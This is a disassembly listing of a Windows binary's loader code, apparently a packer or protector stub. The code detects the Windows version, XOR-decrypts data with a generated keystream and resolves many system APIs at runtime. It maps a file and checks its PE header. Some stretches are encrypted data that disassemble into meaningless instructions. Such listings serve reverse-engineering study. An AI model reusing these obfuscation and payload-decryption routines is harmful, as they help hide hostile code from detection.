dd 216800h, 9BE80026h, 90FFFFFBh, 85C03390h, 6AEE75C0h
dd 40D8B08h, 51004246h, 0FF188D8Dh, 9E8FFFFh, 68000045h
dd 26h, 0FFFB75E8h, 0BD11E4FFh, 0B7672D49h, 0F664B421h
dd 49F51026h, 0CEAEBBCCh, 17454BFBh, 4D57D95Fh, 71BCE89Eh
dd 6C671012h, 9FBD1A3Bh, 15897C62h, 0EFD5B867h, 16F1E4D7h
dd 0CDDAE335h, 0C0339090h, 0EE75C085h, 46040D8Bh, 118B0042h
dd 0A1F05589h, 424604h, 4D89088Bh, 9468ECh, 0C3E80000h
dd 83000099h, 858904C4h, 0FFFFFEFCh, 0FEFC958Bh, 9589FFFFh
dd 0FFFFFF14h, 25B9h, 8BC03300h, 0FFFF14BDh, 8BABF3FFh
dd 0FFFF1485h, 9400C7FFh, 8B000000h, 0FFFF148Dh, 15FF51FFh
dd 4246B8h, 0FF14958Bh, 428BFFFFh, 4600A310h, 85C70042h
dd 0FFFFFF10h, 0
; ---------------------------------------------------------------------------
mov ecx, ds:dword_424600
mov [ebp-10Ch], ecx
cmp dword ptr [ebp-10Ch], 0
jz short loc_412108
cmp dword ptr [ebp-10Ch], 1
jz short loc_412117
cmp dword ptr [ebp-10Ch], 2
jz short loc_41216E
jmp loc_41220B
; ---------------------------------------------------------------------------
loc_412108: ; CODE XREF: _3:004120EF�j
mov dword ptr [ebp-0F0h], offset aWin32s ; "win32s"
jmp loc_41220B
; ---------------------------------------------------------------------------
loc_412117: ; CODE XREF: _3:004120F8�j
mov edx, [ebp-0ECh]
cmp dword ptr [edx+8], 0
jnz short loc_41212F
mov dword ptr [ebp-0F0h], offset aWindows95 ; "Windows95"
jmp short loc_412169
; ---------------------------------------------------------------------------
loc_41212F: ; CODE XREF: _3:00412121�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+8], 0Ah
jnz short loc_412147
mov dword ptr [ebp-0F0h], offset aWindows98 ; "Windows98"
jmp short loc_412169
; ---------------------------------------------------------------------------
loc_412147: ; CODE XREF: _3:00412139�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+8], 5Ah
jnz short loc_41215F
mov dword ptr [ebp-0F0h], offset aWindowsme ; "WindowsMe"
jmp short loc_412169
; ---------------------------------------------------------------------------
loc_41215F: ; CODE XREF: _3:00412151�j
mov dword ptr [ebp-0F0h], offset aWindows9xUnkno ; "Windows9x(unknown)"
loc_412169: ; CODE XREF: _3:0041212D�j _3:00412145�j ...
jmp loc_41220B
; ---------------------------------------------------------------------------
loc_41216E: ; CODE XREF: _3:00412101�j
mov edx, [ebp-0ECh]
cmp dword ptr [edx+4], 3
jnz short loc_412189
mov dword ptr [ebp-0F0h], offset aWindowsnt3_51 ; "WindowsNT(3.51)"
jmp loc_41220B
; ---------------------------------------------------------------------------
loc_412189: ; CODE XREF: _3:00412178�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+4], 4
jnz short loc_4121A1
mov dword ptr [ebp-0F0h], offset aWindowsnt4_0 ; "WindowsNT(4.0)"
jmp short loc_41220B
; ---------------------------------------------------------------------------
loc_4121A1: ; CODE XREF: _3:00412193�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+4], 5
jnz short loc_412201
mov edx, [ebp-0ECh]
cmp dword ptr [edx+8], 0
jnz short loc_4121C5
mov dword ptr [ebp-0F0h], offset aWindows2000 ; "Windows2000"
jmp short loc_4121FF
; ---------------------------------------------------------------------------
loc_4121C5: ; CODE XREF: _3:004121B7�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+8], 1
jnz short loc_4121DD
mov dword ptr [ebp-0F0h], offset aWindowsxp ; "WindowsXP"
jmp short loc_4121FF
; ---------------------------------------------------------------------------
loc_4121DD: ; CODE XREF: _3:004121CF�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+8], 2
jnz short loc_4121F5
mov dword ptr [ebp-0F0h], offset aWindows_net ; "Windows.NET"
jmp short loc_4121FF
; ---------------------------------------------------------------------------
loc_4121F5: ; CODE XREF: _3:004121E7�j
mov dword ptr [ebp-0F0h], offset aWindowsntUnkno ; "WindowsNT(unknown)"
loc_4121FF: ; CODE XREF: _3:004121C3�j _3:004121DB�j ...
jmp short loc_41220B
; ---------------------------------------------------------------------------
loc_412201: ; CODE XREF: _3:004121AB�j
mov dword ptr [ebp-0F0h], offset aWindowsntUnkno ; "WindowsNT(unknown)"
loc_41220B: ; CODE XREF: _3:00412103�j _3:00412112�j ...
mov edx, [ebp-0ECh]
mov [ebp-108h], edx
mov eax, [ebp-108h]
push eax
call sub_41BACD
add esp, 4
mov ecx, ds:dword_424604
mov edx, [ecx+2Ch]
mov [ebp-0F4h], edx
cmp dword ptr [ebp-0F4h], 0
jz short loc_4122AF
mov eax, [ebp-0F4h]
mov [ebp-0FCh], eax
mov dword ptr [ebp-0F8h], 0
jmp short loc_412265
; ---------------------------------------------------------------------------
loc_412256: ; CODE XREF: _3:004122AD�j
mov ecx, [ebp-0F8h]
add ecx, 1
mov [ebp-0F8h], ecx
loc_412265: ; CODE XREF: _3:00412254�j
cmp dword ptr [ebp-0F8h], 80h
jge short loc_4122AF
mov edx, [ebp-0FCh]
imul edx, 19660Dh
add edx, 3C6EF35Fh
mov [ebp-0FCh], edx
mov eax, [ebp-0F8h]
mov ecx, [ebp-0F4h]
mov edx, [ecx+eax*4]
xor edx, [ebp-0FCh]
mov eax, [ebp-0F8h]
mov ecx, [ebp-0F4h]
mov [ecx+eax*4], edx
jmp short loc_412256
; ---------------------------------------------------------------------------
loc_4122AF: ; CODE XREF: _3:0041223C�j _3:0041226F�j
mov edx, ds:dword_424604
mov eax, [edx+24h]
and eax, 10h
neg eax
sbb eax, eax
neg eax
mov ds:byte_424614, al
call sub_418780
mov ecx, [ebp-14h]
mov [ebp+8], ecx
cmp ds:dword_4289B4, 0
jz short loc_4122ED
push 0
push 0
push 0
mov edx, ds:dword_4289B4
push edx
call ds:dword_4247B8 ; PostMessageA
loc_4122ED: ; CODE XREF: _3:004122D8�j
xor eax, eax
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412300 proc near ; CODE XREF: sub_411310+3B3�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_421014 ; GetModuleHandleA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_41232B
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_42100C ; RaiseException
loc_41232B: ; CODE XREF: sub_412300+18�j
push offset aClosehandle ; "CloseHandle"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424624, eax
push offset aCreatefilea ; "CreateFileA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424628, eax
push offset aCreatefilew ; "CreateFileW"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42462C, eax
push offset aCreatefilemapp ; "CreateFileMappingA"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424630, eax
push offset aCreatefilema_0 ; "CreateFileMappingW"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424634, eax
push offset aCreateprocessa ; "CreateProcessA"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424638, eax
push offset aDebugbreak ; "DebugBreak"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42463C, eax
push offset aDeletefilea ; "DeleteFileA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424640, eax
push offset aEntercriticals ; "EnterCriticalSection"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424644, eax
push offset aExitprocess ; "ExitProcess"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424648, eax
push offset aFindclose ; "FindClose"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42464C, eax
push offset aFindfirstfilea ; "FindFirstFileA"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424650, eax
push offset aFindnextfilea ; "FindNextFileA"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424654, eax
push offset aFlushfilebuffe ; "FlushFileBuffers"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424658, eax
push offset aFormatmessagea ; "FormatMessageA"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42465C, eax
push offset aFreelibrary ; "FreeLibrary"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424660, eax
push offset aGetcurrentproc ; "GetCurrentProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424664, eax
push offset aGetcurrentpr_0 ; "GetCurrentProcessId"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424668, eax
push offset aGetenvironment ; "GetEnvironmentVariableA"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42466C, eax
push offset aGetexitcodepro ; "GetExitCodeProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424670, eax
push offset aGetfileattribu ; "GetFileAttributesA"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424674, eax
push offset aGetfileattri_0 ; "GetFileAttributesW"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424678, eax
push offset aGetfileinforma ; "GetFileInformationByHandle"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42467C, eax
push offset aGetfilesize ; "GetFileSize"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424680, eax
push offset aGetfiletime ; "GetFileTime"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424684, eax
push offset aGetfullpathnam ; "GetFullPathNameA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424688, eax
push offset aGetfullpathn_0 ; "GetFullPathNameW"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42468C, eax
push offset aGetlasterror ; "GetLastError"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424690, eax
push offset aGetmodulefilen ; "GetModuleFileNameA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424694, eax
push offset aGetmodulehandl ; "GetModuleHandleA"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424698, eax
push offset aGetprivateprof ; "GetPrivateProfileIntA"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42469C, eax
push offset aGetprivatepr_0 ; "GetPrivateProfileSectionNamesA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246A0, eax
push offset aGetprivatepr_1 ; "GetPrivateProfileStringA"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246A4, eax
push offset aGetprocaddress ; "GetProcAddress"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246A8, eax
push offset aGetsystemtimea ; "GetSystemTimeAsFileTime"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246AC, eax
push offset aGettempfilenam ; "GetTempFileNameA"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246B0, eax
push offset aGettemppatha ; "GetTempPathA"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246B4, eax
push offset aGetversionexa ; "GetVersionExA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246B8, eax
push offset aGettickcount ; "GetTickCount"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246BC, eax
push offset aHeapalloc ; "HeapAlloc"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246C0, eax
push offset aHeapfree ; "HeapFree"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246C4, eax
push offset aHeapcreate ; "HeapCreate"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246C8, eax
push offset aInitializecrit ; "InitializeCriticalSection"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246CC, eax
push offset aDeletecritical ; "DeleteCriticalSection"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246D0, eax
push offset aLeavecriticals ; "LeaveCriticalSection"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246D4, eax
push offset aLoadlibrarya ; "LoadLibraryA"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246DC, eax
push offset aLoadlibraryexa ; "LoadLibraryExA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246D8, eax
push offset aLocalalloc ; "LocalAlloc"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246E0, eax
push offset aLocalfree ; "LocalFree"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246E4, eax
push offset aLockfile ; "LockFile"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246E8, eax
push offset aMapviewoffile ; "MapViewOfFile"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246EC, eax
push offset aMultibytetowid ; "MultiByteToWideChar"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246F0, eax
push offset aOpenprocess ; "OpenProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246F4, eax
push offset aRaiseexception ; "RaiseException"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246F8, eax
push offset aReadfile ; "ReadFile"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4246FC, eax
push offset aSetenvironment ; "SetEnvironmentVariableA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424700, eax
push offset aSetevent ; "SetEvent"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424704, eax
push offset aSetfilepointer ; "SetFilePointer"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424708, eax
push offset aSetlasterror ; "SetLastError"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42470C, eax
push offset aSetunhandledex ; "SetUnhandledExceptionFilter"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424710, eax
push offset aSleep ; "Sleep"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424714, eax
push offset aTerminateproce ; "TerminateProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424718, eax
push offset aUnlockfile ; "UnlockFile"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42471C, eax
push offset aUnmapviewoffil ; "UnmapViewOfFile"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424720, eax
push offset aVirtualalloc ; "VirtualAlloc"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424724, eax
push offset aVirtualfree ; "VirtualFree"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424728, eax
push offset aVirtualprotect ; "VirtualProtect"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42472C, eax
push offset aVirtualquery ; "VirtualQuery"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424730, eax
push offset aWaitforsingleo ; "WaitForSingleObject"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424734, eax
push offset aWidechartomult ; "WideCharToMultiByte"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424738, eax
push offset aWritefile ; "WriteFile"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42473C, eax
push offset aLstrcmpia ; "lstrcmpiA"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424740, eax
push offset aUser32_dll ; "user32.dll"
call ds:dword_4246DC ; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4128F0
push 0
push 0
push 0
push 0EF0000F7h
call ds:dword_42100C ; RaiseException
loc_4128F0: ; CODE XREF: sub_412300+5DD�j
push offset aChangedisplays ; "ChangeDisplaySettingsA"
mov eax, [ebp+var_10]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424744, eax
push offset aCharupperbuffa ; "CharUpperBuffA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424748, eax
push offset aLoadimagea ; "LoadImageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42474C, eax
push offset aMessageboxa ; "MessageBoxA"
mov eax, [ebp+var_10]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424750, eax
push offset aWsprintfa ; "wsprintfA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424754, eax
push offset aWvsprintfa ; "wvsprintfA"
mov edx, [ebp+var_10]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424758, eax
push offset aGdi32_dll ; "gdi32.dll"
call ds:dword_4246DC ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_41298D
push 0
push 0
push 0
push 0EF0000F6h
call ds:dword_42100C ; RaiseException
loc_41298D: ; CODE XREF: sub_412300+67A�j
push offset aAddfontresourc ; "AddFontResourceA"
mov eax, [ebp+var_8]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42475C, eax
push offset aCreatecompatib ; "CreateCompatibleDC"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424760, eax
push offset aCreatedibsecti ; "CreateDIBSection"
mov edx, [ebp+var_8]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424764, eax
push offset aDeletedc ; "DeleteDC"
mov eax, [ebp+var_8]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424768, eax
push offset aRemovefontreso ; "RemoveFontResourceA"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42476C, eax
push offset aBeginpaint ; "BeginPaint"
mov edx, [ebp+var_10]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424770, eax
push offset aEndpaint ; "EndPaint"
mov eax, [ebp+var_10]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424774, eax
push offset aGetobjecta ; "GetObjectA"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424778, eax
push offset aSelectobject ; "SelectObject"
mov edx, [ebp+var_8]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42477C, eax
push offset aDeleteobject ; "DeleteObject"
mov eax, [ebp+var_8]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424780, eax
push offset aBitblt ; "BitBlt"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424784, eax
push offset aGetwindowthrea ; "GetWindowThreadProcessId"
mov edx, [ebp+var_10]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424788, eax
push offset aSetactivewindo ; "SetActiveWindow"
mov eax, [ebp+var_10]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42478C, eax
push offset aSetforegroundw ; "SetForegroundWindow"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424790, eax
push offset aRegisterclasse ; "RegisterClassExA"
mov edx, [ebp+var_10]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424794, eax
push offset aGetsystemmetri ; "GetSystemMetrics"
mov eax, [ebp+var_10]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_424798, eax
push offset aCreatewindowex ; "CreateWindowExA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_42479C, eax
push offset aGetmessagea ; "GetMessageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4247A0, eax
push offset aTranslatemessa ; "TranslateMessage"
mov eax, [ebp+var_10]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4247A4, eax
push offset aDispatchmessag ; "DispatchMessageA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4247A8, eax
push offset aDestroywindow ; "DestroyWindow"
mov edx, [ebp+var_10]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4247AC, eax
push offset aEnumwindows ; "EnumWindows"
mov eax, [ebp+var_10]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4247B0, eax
push offset aDefwindowproca ; "DefWindowProcA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4247B4, eax
push offset aPostmessagea ; "PostMessageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4247B8, eax
push offset aCreatethread ; "CreateThread"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4247BC, eax
mov [ebp+var_4], offset dword_424624
mov [ebp+var_14], offset dword_4247C0
jmp short loc_412B9A
; ---------------------------------------------------------------------------
loc_412B91: ; CODE XREF: sub_412300:loc_412BC9�j
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
loc_412B9A: ; CODE XREF: sub_412300+88F�j
mov edx, [ebp+var_4]
cmp edx, [ebp+var_14]
jz short loc_412BCB
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jnz short loc_412BC9
push 0
push 0
push 0
mov ecx, [ebp+var_4]
sub ecx, offset dword_424620
sar ecx, 2
sub ecx, 10FFEFFFh
push ecx
call ds:dword_42100C ; RaiseException
loc_412BC9: ; CODE XREF: sub_412300+8A8�j
jmp short loc_412B91
; ---------------------------------------------------------------------------
loc_412BCB: ; CODE XREF: sub_412300+8A0�j
mov esp, ebp
pop ebp
retn
sub_412300 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421290
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFD8h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-24h], 0FFFFFFFFh
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-28h], 0
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+8]
push eax
call ds:dword_424628 ; CreateFileA
mov [ebp-24h], eax
cmp dword ptr [ebp-24h], 0FFFFFFFFh
jz short loc_412C8C
push 0
mov ecx, [ebp-24h]
push ecx
call ds:dword_424680 ; GetFileSize
mov [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], 0FFFFFFFFh
jz short loc_412C8C
push 0
mov edx, [ebp-1Ch]
push edx
push 0
push 2
push 0
mov eax, [ebp-24h]
push eax
call ds:dword_424630 ; CreateFileMappingA
mov [ebp-20h], eax
cmp dword ptr [ebp-20h], 0
jz short loc_412C8C
mov ecx, [ebp-1Ch]
push ecx
push 0
push 0
push 4
mov edx, [ebp-20h]
push edx
call ds:dword_4246EC ; MapViewOfFile
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jnz short loc_412C96
loc_412C8C: ; CODE XREF: _3:00412C39�j _3:00412C4E�j ...
mov ecx, 0EF000001h
call sub_41BA32
loc_412C96: ; CODE XREF: _3:00412C8A�j
mov eax, [ebp-28h]
mov ecx, [ebp-28h]
add ecx, [eax+3Ch]
mov [ebp-30h], ecx
mov edx, [ebp-30h]
cmp dword ptr [edx], 4550h
jz short loc_412CB7
mov ecx, 0EF000002h
call sub_41BA32
loc_412CB7: ; CODE XREF: _3:00412CAB�j
mov eax, ds:off_42461C
mov [ebp-34h], eax
mov ecx, [ebp-30h]
mov edx, [ebp+10h]
sub edx, [ecx+34h]
mov [ebp-2Ch], edx
push 1190000h
call sub_411B9E
mov al, ds:0E19779ADh
mov cl, 0Bh
db 65h
pop edi
loopne loc_412D2E
mov esi, 9BE6D9CCh
clc
or eax, 0CBF271Ah
sahf
or ah, bl
cmp [esi-49D7FC99h], cl
retn
; ---------------------------------------------------------------------------
db 17h, 98h, 22h
dd 1E1104F7h, 7CE31C0h, 87BBEF97h, 3165F51Ah, 0EBDA1C82h
dd 22574EE3h, 56FCBF20h, 87F67063h, 0BEF3E28Fh, 0CBE63148h
dd 4E6CC4B2h, 318515B8h, 0CB0A5CB5h
db 57h, 23h
; ---------------------------------------------------------------------------
loc_412D2E: ; CODE XREF: _3:00412CDE�j
clc
push ss
in al, 90h
stc
cli
mov bl, [ebp-37h]
mov eax, ds:0D5039062h
db 2Eh
mov al, 0EEh
push edx
mov bh, 27h
hlt
; ---------------------------------------------------------------------------
db 0Ah
dword_412D44 dd 0F935B558h, 7C351553h, 8A5905B0h, 9689FD2Fh, 0A175F528h
dd 0B37ACC17h, 72E49BDFh, 0ED9519B4h, 0B19D8237h, 834AE466h
dd 2A3C8313h, 0BDE54984h, 2E5E8806h, 0D31A907Dh, 0DA91357Fh
dd 4B72BE9Fh, 0BB27C81Fh, 548A5447h, 0C95DCDF0h, 0DB42946Fh
dd 0ABFB6FFh, 2E305894h, 0F9422E4Bh, 74F2442Ah, 16884B9Bh
dd 1E11B86Ch, 8A60A34Ah, 0FD418E24h, 0E7165CC6h, 0CE9DC76Fh
dd 5F8EA9FFh, 0C6F7C413h, 49846053h, 695E6B78h, 0E2D534FEh
dd 6E2FCEFh, 4A3D319Bh, 1BFAA757h, 4EE05F63h, 0E6D9CCBFh
dd 1A0C199Bh, 0A3F1DC27h, 909097A4h, 0D285D233h, 45C7EE75h
dd 0FFFFFFFCh, 2E8FFh, 31EB0000h, 0D87D83h, 458B0A74h
dd 15FF50D8h, 424720h, 0E07D83h, 4D8B0A74h, 15FF51E0h
dd 424624h, 0DC7D83h, 558B0A74h, 15FF52DCh, 424624h, 0F04D8BC3h
dd 0D8964h, 5F000000h, 0E58B5B5Eh, 0CCCCC35Dh, 2 dup(0CCCCCCCCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4212A8
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFE88h
push ebx
push esi
push edi
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
push 105h
call sub_41BA4A
add esp, 4
mov [ebp-184h], eax
mov eax, [ebp-184h]
mov [ebp-1Ch], eax
push 104h
mov ecx, [ebp-1Ch]
push ecx
push 0
call ds:dword_424698 ; GetModuleHandleA
push eax
call ds:dword_424694 ; GetModuleFileNameA
mov edx, [ebp+0Ch]
add edx, 82h
mov [ebp-24h], edx
mov eax, [ebp-24h]
mov ecx, [eax]
and ecx, 4
neg ecx
sbb ecx, ecx
neg ecx
mov [ebp-20h], ecx
cmp dword ptr [ebp-20h], 0
jz loc_41301E
lea ecx, [ebp-160h]
call sub_41AE88
mov dword ptr [ebp-164h], 10h
push 290000h
call sub_411B9E
xor ds:33511589h, bh
wait
adc eax, 7F2E5083h
mov cl, 0C4h
neg byte ptr [ebp+1CDB828Fh]
icebp
push ebp
in al, dx
and esi, [edi+19h]
or eax, 2ADD8F00h
pop ebx
imul ecx, [ebp+7Eh], 62F19C67h
db 64h
push edi
and eax, 6C1CFC52h
db 36h ; CODE XREF: _3:00412F33�j
